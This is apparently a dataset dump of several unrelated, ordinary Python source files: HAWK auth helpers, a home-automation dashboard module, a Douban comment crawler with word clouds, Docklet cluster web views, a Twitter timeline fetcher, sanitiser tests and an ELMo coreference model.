return content_type.split(';')[0].strip().lower()
else:
return ''
def calculate_ts_mac(ts, credentials):
"""Calculates a timestamp message authentication code for HAWK."""
data = 'hawk.' + str(HAWK_VER) + '.ts\n' + ts + '\n'
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], data, digestmod)
return b64encode(result.digest())
def random_string(length):
"""Generates a random string for a given length."""
return ''.join(random.choice(string.lowercase) for i in range(length))
def calculate_bewit(credentials, artifacts, exp):
"""Calculates mac and formats a string for the bewit."""
mac = calculate_mac('bewit', credentials, artifacts, True)
# Construct bewit: id\exp\mac\ext
bewit = '\\'.join([credentials['id'], str(int(exp)), mac, artifacts['ext']])
return urlsafe_b64encode(bewit)
def explode_bewit(bewit):
"""Decodes a bewit and returns a dict of the parts.
keys include: id, exp - expiration timestamp as integer, mac, ext
"""
clear_b = urlsafe_b64decode(bewit)
parts = clear_b.split('\\')
if 4 != len(parts):
print "Wrong number of bewit parts"
raise InvalidBewit
return {
'id': parts[0],
'exp': int(parts[1]),
'mac': parts[2],
'ext': parts[3]
}
| en | 0.639147 | # -*- coding: utf-8 -*- Crypto functions for HAWK authentication Exception raised for bad configuration of algorithm. Exception raised for invalid bewit value. Calculates a message authentication code (MAC). Returns a hashlib algorithm based on given string. Serializes mac_type and options into a HAWK string. # TODO this smells Calculates a hash for a given payload. Cleans up content_type. Calculates a timestamp message authentication code for HAWK. Generates a random string for a given length. Calculates mac and formats a string for the bewit. # Construct bewit: id\exp\mac\ext Decodes a bewit and returns a dict of the parts. keys include: id, exp - expiration timestamp as integer, mac, ext | 2.973562 | 3 |
homecontrol/modules/dashboard/module.py | lennart-k/HomeControl | 7 | 6614009 | <filename>homecontrol/modules/dashboard/module.py
"""The dashboard module"""
from typing import TYPE_CHECKING, Any, Dict, List, cast
import voluptuous as vol
from attr import attrib, attrs
from homecontrol.const import EVENT_CORE_BOOTSTRAP_COMPLETE
from homecontrol.dependencies.entity_types import ModuleDef
from homecontrol.dependencies.linter_friendly_attrs import LinterFriendlyAttrs
from .commands import add_commands
if TYPE_CHECKING:
from homecontrol.modules.websocket.module import Module as WebSocketModule
SPEC = {
"name": "Dashboard",
"description": "Provides the Frontend's dashboards"
}
DASHBOARD_SCHEMA = vol.Schema({
vol.Required("identifier"): str,
vol.Required("sections", default=list): list,
vol.Optional("name"): str,
vol.Optional("icon"): str
}, extra=vol.ALLOW_EXTRA)
CONFIG_SCHEMA = vol.Schema([DASHBOARD_SCHEMA])
@attrs(slots=True)
class Dashboard(LinterFriendlyAttrs):
"""A dashboard"""
identifier: str = attrib()
provider: str = attrib()
name: str = attrib(default=None)
icon: str = attrib(default="")
sections: list = attrib(default=[])
def __attrs_post_init__(self) -> None:
self.name = self.name or self.identifier
class Module(ModuleDef):
"""Provides dashboard configuration for frontend"""
dashboards: Dict[str, Dashboard]
async def init(self) -> None:
self.dashboards = {}
await self.load_yaml_config()
@self.core.event_bus.register(EVENT_CORE_BOOTSTRAP_COMPLETE)
async def add_websocket_commands(event) -> None:
ws_mod = cast("WebSocketModule", self.core.modules.websocket)
add_commands(ws_mod.add_command_handler)
async def load_yaml_config(self) -> None:
"""Loads YAML config"""
cfg = cast(List[Dict[str, Any]], await self.core.cfg.register_domain(
"dashboards",
CONFIG_SCHEMA,
default=[]
))
for dashboard_config in cfg:
dashboard = Dashboard(
identifier=dashboard_config["identifier"],
name=dashboard_config.get("name"),
icon=dashboard_config.get("icon"),
sections=dashboard_config["sections"],
provider="yaml"
)
self.register_dashboard(dashboard)
def register_dashboard(self, dashboard: Dashboard) -> None:
"""Registers a Dashboard"""
self.dashboards[dashboard.identifier] = dashboard
| <filename>homecontrol/modules/dashboard/module.py
"""The dashboard module"""
from typing import TYPE_CHECKING, Any, Dict, List, cast
import voluptuous as vol
from attr import attrib, attrs
from homecontrol.const import EVENT_CORE_BOOTSTRAP_COMPLETE
from homecontrol.dependencies.entity_types import ModuleDef
from homecontrol.dependencies.linter_friendly_attrs import LinterFriendlyAttrs
from .commands import add_commands
if TYPE_CHECKING:
from homecontrol.modules.websocket.module import Module as WebSocketModule
SPEC = {
"name": "Dashboard",
"description": "Provides the Frontend's dashboards"
}
DASHBOARD_SCHEMA = vol.Schema({
vol.Required("identifier"): str,
vol.Required("sections", default=list): list,
vol.Optional("name"): str,
vol.Optional("icon"): str
}, extra=vol.ALLOW_EXTRA)
CONFIG_SCHEMA = vol.Schema([DASHBOARD_SCHEMA])
@attrs(slots=True)
class Dashboard(LinterFriendlyAttrs):
"""A dashboard"""
identifier: str = attrib()
provider: str = attrib()
name: str = attrib(default=None)
icon: str = attrib(default="")
sections: list = attrib(default=[])
def __attrs_post_init__(self) -> None:
self.name = self.name or self.identifier
class Module(ModuleDef):
"""Provides dashboard configuration for frontend"""
dashboards: Dict[str, Dashboard]
async def init(self) -> None:
self.dashboards = {}
await self.load_yaml_config()
@self.core.event_bus.register(EVENT_CORE_BOOTSTRAP_COMPLETE)
async def add_websocket_commands(event) -> None:
ws_mod = cast("WebSocketModule", self.core.modules.websocket)
add_commands(ws_mod.add_command_handler)
async def load_yaml_config(self) -> None:
"""Loads YAML config"""
cfg = cast(List[Dict[str, Any]], await self.core.cfg.register_domain(
"dashboards",
CONFIG_SCHEMA,
default=[]
))
for dashboard_config in cfg:
dashboard = Dashboard(
identifier=dashboard_config["identifier"],
name=dashboard_config.get("name"),
icon=dashboard_config.get("icon"),
sections=dashboard_config["sections"],
provider="yaml"
)
self.register_dashboard(dashboard)
def register_dashboard(self, dashboard: Dashboard) -> None:
"""Registers a Dashboard"""
self.dashboards[dashboard.identifier] = dashboard
| en | 0.468201 | The dashboard module A dashboard Provides dashboard configuration for frontend Loads YAML config Registers a Dashboard | 2.255016 | 2 |
mapping/star/discretized_bath/base/eocoeff.py | fhoeb/py-mapping | 1 | 6614010 | """
Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to
div/0 exceptions)
"""
class EOFCoefficients(Exception):
def __init__(self, nof_calc_coeff):
"""
Constructor
:param nof_calc_coeff: Number of successfully calculated discretization coefficients
"""
self.nof_calc_coeff = nof_calc_coeff
| """
Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to
div/0 exceptions)
"""
class EOFCoefficients(Exception):
def __init__(self, nof_calc_coeff):
"""
Constructor
:param nof_calc_coeff: Number of successfully calculated discretization coefficients
"""
self.nof_calc_coeff = nof_calc_coeff
| en | 0.933898 | Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to div/0 exceptions) Constructor :param nof_calc_coeff: Number of successfully calculated discretization coefficients | 2.263463 | 2 |
crawler.py | ManiaciaChao/naive-wordcloud | 0 | 6614011 | import re
import json
import time
import jieba
import logging
import requests
import numpy as np
from urllib.parse import quote
from wordcloud import WordCloud
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
jieba.setLogLevel(logging.INFO)
stopwords_path = "./input/stopwords.txt"
stopwords_set = set(line.strip()
for line in open(stopwords_path, "r", encoding="utf8"))
class DoubanCrawler:
def __init__(self):
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
'Host': 'book.douban.com'
} # book's headers
self.book_search_url = "https://book.douban.com/j/subject_suggest?q="
self.book_url = "https://book.douban.com/subject/%s/"
self.book_comment_url = "https://book.douban.com/subject/%s/comments/?start=%d&limit=20&status=P&sort=new_score"
self.words_dict = {} # word cloud input
def info_crawl(self, name, keywords, bg_image=None):
name_str = self.__handle_name(name) # url encodeded
self.book_search_url += name_str
self.book_url, num_str = self.__find_url(self.book_search_url)
for i in range(0, 10):
url = self.book_comment_url % (num_str, i*20)
time.sleep(np.random.randint(1, 3))
print("crawling page %d" % (i + 1), url)
r = requests.get(url, headers=self.headers)
soup = BeautifulSoup(r.content, 'lxml')
comment_list = soup.find_all('span', class_='short')
for ct in comment_list:
line = ct.text.strip()
if any(line.find(e) >= 0 for e in keywords):
words = filter(lambda x: x not in stopwords_set,
jieba.cut(line))
for word in words:
if word not in self.words_dict:
self.words_dict[word] = 1
else:
self.words_dict[word] += 1
self.__comment_to_txt(name, comment_list)
self.__plot_wordcloud(name)
def __plot_wordcloud(self, name):
print("plot wordcloud...")
word_cloud = WordCloud(
scale=10,
font_path='C:/Windows/Fonts/msyh.ttc',
background_color="white", width=1000, height=1000
).generate_from_frequencies(self.words_dict)
file_name = "./output/{}.png".format(name)
word_cloud.to_file(file_name)
plt.imshow(word_cloud, interpolation='bilinear')
plt.axis('off')
plt.show()
def __comment_to_txt(self, name, clist):
file_name = "./output/{}.txt".format(name)
with open(file_name, 'w+', encoding='utf-8') as f:
for ct in clist:
f.write(ct.text)
f.close()
def __handle_name(self, name):
return str(quote(name))
def __find_url(self, url):
r = requests.get(url, headers=self.headers)
json_data = json.loads(r.text)
address_num = re.search('[0-9]+', json_data[0]['url'])
print(self.book_url % address_num.group(0))
return self.book_url % address_num, address_num.group(0)
if __name__ == '__main__':
book_name = input("type book name: ")
print('got boot name: ', book_name)
keywords = input("type keywords (separated by space): ").split()
print('got keywords: ', keywords)
crawler = DoubanCrawler()
crawler.info_crawl(book_name, keywords)
| import re
import json
import time
import jieba
import logging
import requests
import numpy as np
from urllib.parse import quote
from wordcloud import WordCloud
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
jieba.setLogLevel(logging.INFO)
stopwords_path = "./input/stopwords.txt"
stopwords_set = set(line.strip()
for line in open(stopwords_path, "r", encoding="utf8"))
class DoubanCrawler:
def __init__(self):
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
'Host': 'book.douban.com'
} # book's headers
self.book_search_url = "https://book.douban.com/j/subject_suggest?q="
self.book_url = "https://book.douban.com/subject/%s/"
self.book_comment_url = "https://book.douban.com/subject/%s/comments/?start=%d&limit=20&status=P&sort=new_score"
self.words_dict = {} # word cloud input
def info_crawl(self, name, keywords, bg_image=None):
name_str = self.__handle_name(name) # url encodeded
self.book_search_url += name_str
self.book_url, num_str = self.__find_url(self.book_search_url)
for i in range(0, 10):
url = self.book_comment_url % (num_str, i*20)
time.sleep(np.random.randint(1, 3))
print("crawling page %d" % (i + 1), url)
r = requests.get(url, headers=self.headers)
soup = BeautifulSoup(r.content, 'lxml')
comment_list = soup.find_all('span', class_='short')
for ct in comment_list:
line = ct.text.strip()
if any(line.find(e) >= 0 for e in keywords):
words = filter(lambda x: x not in stopwords_set,
jieba.cut(line))
for word in words:
if word not in self.words_dict:
self.words_dict[word] = 1
else:
self.words_dict[word] += 1
self.__comment_to_txt(name, comment_list)
self.__plot_wordcloud(name)
def __plot_wordcloud(self, name):
print("plot wordcloud...")
word_cloud = WordCloud(
scale=10,
font_path='C:/Windows/Fonts/msyh.ttc',
background_color="white", width=1000, height=1000
).generate_from_frequencies(self.words_dict)
file_name = "./output/{}.png".format(name)
word_cloud.to_file(file_name)
plt.imshow(word_cloud, interpolation='bilinear')
plt.axis('off')
plt.show()
def __comment_to_txt(self, name, clist):
file_name = "./output/{}.txt".format(name)
with open(file_name, 'w+', encoding='utf-8') as f:
for ct in clist:
f.write(ct.text)
f.close()
def __handle_name(self, name):
return str(quote(name))
def __find_url(self, url):
r = requests.get(url, headers=self.headers)
json_data = json.loads(r.text)
address_num = re.search('[0-9]+', json_data[0]['url'])
print(self.book_url % address_num.group(0))
return self.book_url % address_num, address_num.group(0)
if __name__ == '__main__':
book_name = input("type book name: ")
print('got boot name: ', book_name)
keywords = input("type keywords (separated by space): ").split()
print('got keywords: ', keywords)
crawler = DoubanCrawler()
crawler.info_crawl(book_name, keywords)
| en | 0.484863 | # book's headers # word cloud input # url encodeded | 2.822434 | 3 |
web/webViews/cluster.py | SourceZh/Docklet | 0 | 6614012 | from flask import session
from webViews.view import normalView
from webViews.dockletrequest import dockletRequest
from webViews.dashboard import *
import time, re
class addClusterView(normalView):
template_path = "addCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/image/list/")
images = result.get("images")
if (result):
return self.render(self.template_path, user = session['username'], images = images)
else:
self.error()
class createClusterView(normalView):
template_path = "dashboard.html"
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:],
}
result = dockletRequest.post("/cluster/create/", data)
if(result.get('success', None) == "true"):
return dashboardView.as_view()
#return self.render(self.template_path, user = session['username'])
else:
return self.render(self.error_path, message = result.get('message'))
class descriptionImageView(normalView):
template_path = "image_description.html"
@classmethod
def get(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"imagename": self.image[:index2],
"imageowner": self.image[index2+1:index1],
"imagetype": self.image[index1+1:]
}
result = dockletRequest.post("/image/description/", data)
if(result):
description = result.get("message")
return self.render(self.template_path, description = description)
else:
self.error()
class scaleoutView(normalView):
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:]
}
result = dockletRequest.post("/cluster/scaleout/", data)
if(result.get('success', None) == "true"):
return configView.as_view()
else:
return self.render(self.error_path, message = result.get('message'))
class scaleinView(normalView):
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"containername":self.containername
}
result = dockletRequest.post("/cluster/scalein/", data)
if(result):
return configView.as_view()
else:
self.error()
class listClusterView(normalView):
template_path = "listCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/cluster/list/")
clusters = result.get("clusters")
if(result):
return self.render(self.template_path, user = session['username'], clusters = clusters)
else:
self.error()
class startClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/start/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class stopClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/stop/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class flushClusterView(normalView):
success_path = "opsuccess.html"
failed_path = "opfailed.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"from_lxc": self.containername
}
result = dockletRequest.post("/cluster/flush/", data)
if(result):
if result.get('success') == "true":
return self.render(self.success_path, user = session['username'])
else:
return self.render(self.failed_path, user = session['username'])
else:
self.error()
class deleteClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/delete/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class detailClusterView(normalView):
template_path = "listcontainer.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/info/", data)
if(result):
message = result.get('message')
containers = message['containers']
status = message['status']
return self.render(self.template_path, containers = containers, user = session['username'], clustername = self.clustername, status = status)
else:
self.error()
class saveImageView(normalView):
template_path = "saveconfirm.html"
success_path = "opsuccess.html"
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"image": self.imagename,
"containername": self.containername,
"description": self.description,
"isforce": self.isforce
}
result = dockletRequest.post("/cluster/save/", data)
if(result):
if result.get('success') == 'true':
#return self.render(self.success_path, user = session['username'])
return configView.as_view()
#res = detailClusterView()
#res.clustername = self.clustername
#return res.as_view()
else:
return self.render(self.template_path, containername = self.containername, clustername = self.clustername, image = self.imagename, user = session['username'], description = self.description)
else:
self.error()
class shareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/share/", data)
if(result):
return configView.as_view()
else:
self.error()
class unshareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/unshare/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/delete/", data)
if(result):
return configView.as_view()
else:
self.error()
class addproxyView(normalView):
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"ip": self.ip,
"port": self.port
}
result = dockletRequest.post("/addproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteproxyView(normalView):
@classmethod
def get(self):
data = {
"clustername":self.clustername
}
result = dockletRequest.post("/deleteproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
@classmethod
def post(self):
return self.get()
class configView(normalView):
@classmethod
def get(self):
images = dockletRequest.post('/image/list/').get('images')
clusters = dockletRequest.post("/cluster/list/").get("clusters")
clusters_info = {}
data={}
for cluster in clusters:
data["clustername"] = cluster
result = dockletRequest.post("/cluster/info/",data).get("message")
clusters_info[cluster] = result
return self.render("config.html", images = images, clusters = clusters_info, mysession=dict(session))
@classmethod
def post(self):
return self.get()
| from flask import session
from webViews.view import normalView
from webViews.dockletrequest import dockletRequest
from webViews.dashboard import *
import time, re
class addClusterView(normalView):
template_path = "addCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/image/list/")
images = result.get("images")
if (result):
return self.render(self.template_path, user = session['username'], images = images)
else:
self.error()
class createClusterView(normalView):
template_path = "dashboard.html"
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:],
}
result = dockletRequest.post("/cluster/create/", data)
if(result.get('success', None) == "true"):
return dashboardView.as_view()
#return self.render(self.template_path, user = session['username'])
else:
return self.render(self.error_path, message = result.get('message'))
class descriptionImageView(normalView):
template_path = "image_description.html"
@classmethod
def get(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"imagename": self.image[:index2],
"imageowner": self.image[index2+1:index1],
"imagetype": self.image[index1+1:]
}
result = dockletRequest.post("/image/description/", data)
if(result):
description = result.get("message")
return self.render(self.template_path, description = description)
else:
self.error()
class scaleoutView(normalView):
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:]
}
result = dockletRequest.post("/cluster/scaleout/", data)
if(result.get('success', None) == "true"):
return configView.as_view()
else:
return self.render(self.error_path, message = result.get('message'))
class scaleinView(normalView):
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"containername":self.containername
}
result = dockletRequest.post("/cluster/scalein/", data)
if(result):
return configView.as_view()
else:
self.error()
class listClusterView(normalView):
template_path = "listCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/cluster/list/")
clusters = result.get("clusters")
if(result):
return self.render(self.template_path, user = session['username'], clusters = clusters)
else:
self.error()
class startClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/start/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class stopClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/stop/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class flushClusterView(normalView):
success_path = "opsuccess.html"
failed_path = "opfailed.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"from_lxc": self.containername
}
result = dockletRequest.post("/cluster/flush/", data)
if(result):
if result.get('success') == "true":
return self.render(self.success_path, user = session['username'])
else:
return self.render(self.failed_path, user = session['username'])
else:
self.error()
class deleteClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/delete/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class detailClusterView(normalView):
template_path = "listcontainer.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/info/", data)
if(result):
message = result.get('message')
containers = message['containers']
status = message['status']
return self.render(self.template_path, containers = containers, user = session['username'], clustername = self.clustername, status = status)
else:
self.error()
class saveImageView(normalView):
template_path = "saveconfirm.html"
success_path = "opsuccess.html"
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"image": self.imagename,
"containername": self.containername,
"description": self.description,
"isforce": self.isforce
}
result = dockletRequest.post("/cluster/save/", data)
if(result):
if result.get('success') == 'true':
#return self.render(self.success_path, user = session['username'])
return configView.as_view()
#res = detailClusterView()
#res.clustername = self.clustername
#return res.as_view()
else:
return self.render(self.template_path, containername = self.containername, clustername = self.clustername, image = self.imagename, user = session['username'], description = self.description)
else:
self.error()
class shareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/share/", data)
if(result):
return configView.as_view()
else:
self.error()
class unshareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/unshare/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/delete/", data)
if(result):
return configView.as_view()
else:
self.error()
class addproxyView(normalView):
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"ip": self.ip,
"port": self.port
}
result = dockletRequest.post("/addproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteproxyView(normalView):
@classmethod
def get(self):
data = {
"clustername":self.clustername
}
result = dockletRequest.post("/deleteproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
@classmethod
def post(self):
return self.get()
class configView(normalView):
@classmethod
def get(self):
images = dockletRequest.post('/image/list/').get('images')
clusters = dockletRequest.post("/cluster/list/").get("clusters")
clusters_info = {}
data={}
for cluster in clusters:
data["clustername"] = cluster
result = dockletRequest.post("/cluster/info/",data).get("message")
clusters_info[cluster] = result
return self.render("config.html", images = images, clusters = clusters_info, mysession=dict(session))
@classmethod
def post(self):
return self.get()
| en | 0.355158 | #return self.render(self.template_path, user = session['username']) #return self.render(self.success_path, user = session['username']) #res = detailClusterView() #res.clustername = self.clustername #return res.as_view() | 2.214666 | 2 |
files/generateIntegerFile.py | benitodarder/python-workshop | 0 | 6614013 | <filename>files/generateIntegerFile.py
import datetime;
import random;
def main(args):
randomIntegersUpperLimit = int(args[2])
file = open(args[1], 'w')
t0 = datetime.datetime.now().timestamp()
for index in range(randomIntegersUpperLimit):
file.write(str(random.randrange(randomIntegersUpperLimit)) + "\n")
t1 = datetime.datetime.now().timestamp()
print("Python generated " + args[2] + " pseudo random integers in " + str((t1 - t0) * 1000) + "ms. and saved them to: " + args[1])
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv)) | <filename>files/generateIntegerFile.py
import datetime;
import random;
def main(args):
randomIntegersUpperLimit = int(args[2])
file = open(args[1], 'w')
t0 = datetime.datetime.now().timestamp()
for index in range(randomIntegersUpperLimit):
file.write(str(random.randrange(randomIntegersUpperLimit)) + "\n")
t1 = datetime.datetime.now().timestamp()
print("Python generated " + args[2] + " pseudo random integers in " + str((t1 - t0) * 1000) + "ms. and saved them to: " + args[1])
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv)) | none | 1 | 3.633726 | 4 | |
twitterlib/timeline.py | MichaelCurrin/twitter-lib-python | 0 | 6614014 | """
Timeline module.
"""
import sys
import tweepy
from . import api_auth, constants, lib
def get_timeline(api, screen_name=None, user_id=None):
"""
Get tweets of a selected user.
"""
count = constants.MaxCount.TIMELINE
tweet_mode = constants.TweetMode.EXTENDED
cursor = tweepy.Cursor(
api.user_timeline,
screen_name=screen_name,
user_id=user_id,
count=count.value,
tweet_mode=tweet_mode.value,
)
return cursor
def main(args):
"""
Command-line entry-point.
"""
api = api_auth.app_access_token_api()
assert len(args) == 1, "Expected screen name as an argument"
screen_name = args.pop(0)
cursor = get_timeline(api, screen_name=screen_name)
lib.print_tweets(cursor.items())
if __name__ == "__main__":
main(sys.argv[1:])
| """
Timeline module.
"""
import sys
import tweepy
from . import api_auth, constants, lib
def get_timeline(api, screen_name=None, user_id=None):
"""
Get tweets of a selected user.
"""
count = constants.MaxCount.TIMELINE
tweet_mode = constants.TweetMode.EXTENDED
cursor = tweepy.Cursor(
api.user_timeline,
screen_name=screen_name,
user_id=user_id,
count=count.value,
tweet_mode=tweet_mode.value,
)
return cursor
def main(args):
"""
Command-line entry-point.
"""
api = api_auth.app_access_token_api()
assert len(args) == 1, "Expected screen name as an argument"
screen_name = args.pop(0)
cursor = get_timeline(api, screen_name=screen_name)
lib.print_tweets(cursor.items())
if __name__ == "__main__":
main(sys.argv[1:])
| en | 0.558229 | Timeline module. Get tweets of a selected user. Command-line entry-point. | 3.146187 | 3 |
tests/test_sanitiser.py | chrisbrake/PythonSandbox | 1 | 6614015 | <filename>tests/test_sanitiser.py
from hypothesis import given
from hypothesis.strategies import dictionaries, text, integers
from unittest import TestCase
from sanitiser import sanitiser
class TestSanitiser(TestCase):
""" Testing Sanitiser Functions """
@given(test_dict=dictionaries(
keys=text(), values=text(), min_size=1))
def test_keys_are_strings_true(self, test_dict):
"""
Assuming a dict of at least one entry that contains text we should
get a True back
"""
self.assertTrue(sanitiser.keys_and_values_are_strings(test_dict))
@given(test_dict=dictionaries(
keys=integers(), values=integers(), min_size=1))
def test_keys_are_strings_false(self, test_dict):
"""
Given an empty dict, or one that contains something other than
text we should fail.
"""
self.assertFalse(sanitiser.keys_and_values_are_strings(test_dict))
| <filename>tests/test_sanitiser.py
from hypothesis import given
from hypothesis.strategies import dictionaries, text, integers
from unittest import TestCase
from sanitiser import sanitiser
class TestSanitiser(TestCase):
""" Testing Sanitiser Functions """
@given(test_dict=dictionaries(
keys=text(), values=text(), min_size=1))
def test_keys_are_strings_true(self, test_dict):
"""
Assuming a dict of at least one entry that contains text we should
get a True back
"""
self.assertTrue(sanitiser.keys_and_values_are_strings(test_dict))
@given(test_dict=dictionaries(
keys=integers(), values=integers(), min_size=1))
def test_keys_are_strings_false(self, test_dict):
"""
Given an empty dict, or one that contains something other than
text we should fail.
"""
self.assertFalse(sanitiser.keys_and_values_are_strings(test_dict))
| en | 0.917186 | Testing Sanitiser Functions Assuming a dict of at least one entry that contains text we should get a True back Given an empty dict, or one that contains something other than text we should fail. | 3.39442 | 3 |
src/contextual_model_elmo.py | matejklemen/slovene-coreference-resolution | 2 | 6614016 | import argparse
import json
import logging
import os
import sys
from itertools import chain
from typing import Optional, Dict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from allennlp.data.token_indexers.elmo_indexer import ELMoCharacterMapper
from allennlp.modules.elmo import Elmo, batch_to_ids
from sklearn.model_selection import KFold
from common import ControllerBase, NeuralCoreferencePairScorer
from utils import split_into_sets, fixed_split, KFoldStateCache
from data import read_corpus, Document
# Command-line interface for training/evaluating the contextual ELMo coreference model.
parser = argparse.ArgumentParser()
parser.add_argument("--model_name", type=str, default=None)
# Model capacity / regularization hyperparameters.
parser.add_argument("--hidden_size", type=int, default=128)
parser.add_argument("--fc_hidden_size", type=int, default=150)
parser.add_argument("--dropout", type=float, default=0.2)
# Optimization settings.
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epochs", type=int, default=10)
parser.add_argument("--max_segment_size", type=int, default=None,
                    help="Size of nonoverlapping segments into which a document will be split, with each segment being "
                         "processed independently. By default, a segment corresponds to a single sentence.")
parser.add_argument("--dataset", type=str, default="coref149")
parser.add_argument("--random_seed", type=int, default=13)
# If set, ELMo weights are kept fixed and only the LSTM encoder + scorer are trained.
parser.add_argument("--freeze_pretrained", action="store_true")
parser.add_argument("--fixed_split", action="store_true")
# Path to a JSON cache allowing an interrupted K-fold CV run to be resumed.
parser.add_argument("--kfold_state_cache_path", type=str, default=None)
# All modules and tensors are placed on the GPU when one is available.
DEVICE = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class ContextualControllerELMo(ControllerBase):
    """Coreference controller that embeds tokens with (optionally fine-tuned) ELMo,
    contextualizes them with a bidirectional LSTM, and scores mention-pair
    (head, antecedent-candidate) combinations with a NeuralCoreferencePairScorer.

    Documents are processed either sentence-by-sentence (``max_segment_size=None``)
    or in fixed-size token segments; mention spans are truncated/padded to
    ``max_span_size`` positions.
    """
    def __init__(self,
                 hidden_size,
                 dropout,
                 pretrained_embeddings_dir,
                 dataset_name,
                 fc_hidden_size=150,
                 freeze_pretrained=True,
                 learning_rate=0.001,
                 layer_learning_rate: Optional[Dict[str, float]] = None,
                 max_segment_size=None,  # if None, process sentences independently
                 max_span_size=10,
                 model_name=None):
        # Hyperparameters are stored on the instance so save_pretrained() can
        # serialize them into controller_config.json for later re-instantiation.
        self.hidden_size = hidden_size
        self.dropout = dropout
        self.freeze_pretrained = freeze_pretrained
        self.fc_hidden_size = fc_hidden_size
        self.max_span_size = max_span_size
        self.max_segment_size = max_segment_size
        self.learning_rate = learning_rate
        self.layer_learning_rate = layer_learning_rate if layer_learning_rate is not None else {}
        self.pretrained_embeddings_dir = pretrained_embeddings_dir
        # ELMo's internal dropout is only enabled when the embedder is being fine-tuned.
        self.embedder = Elmo(options_file=os.path.join(pretrained_embeddings_dir, "options.json"),
                             weight_file=os.path.join(pretrained_embeddings_dir, "slovenian-elmo-weights.hdf5"),
                             dropout=(0.0 if freeze_pretrained else dropout),
                             num_output_representations=1,
                             requires_grad=(not freeze_pretrained)).to(DEVICE)
        embedding_size = self.embedder.get_output_dim()
        self.context_encoder = nn.LSTM(input_size=embedding_size, hidden_size=hidden_size,
                                       batch_first=True, bidirectional=True).to(DEVICE)
